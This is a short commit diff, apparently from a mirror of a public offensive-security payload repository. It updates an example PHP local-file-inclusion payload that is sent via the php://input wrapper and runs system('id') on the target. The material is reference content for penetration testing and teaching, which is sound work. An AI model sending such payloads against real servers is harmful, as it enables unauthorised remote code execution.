mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-30 15:15:04 +00:00
commit
0309a2efbd
@ -186,7 +186,7 @@ Specify your payload in the POST parameters
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=php://input
|
||||
POST DATA: <? system('id'); ?>
|
||||
POST DATA: <?php system('id'); ?>
|
||||
```
|
||||
|
||||
### Wrapper phar://
|
||||
|
Loading…
Reference in New Issue
Block a user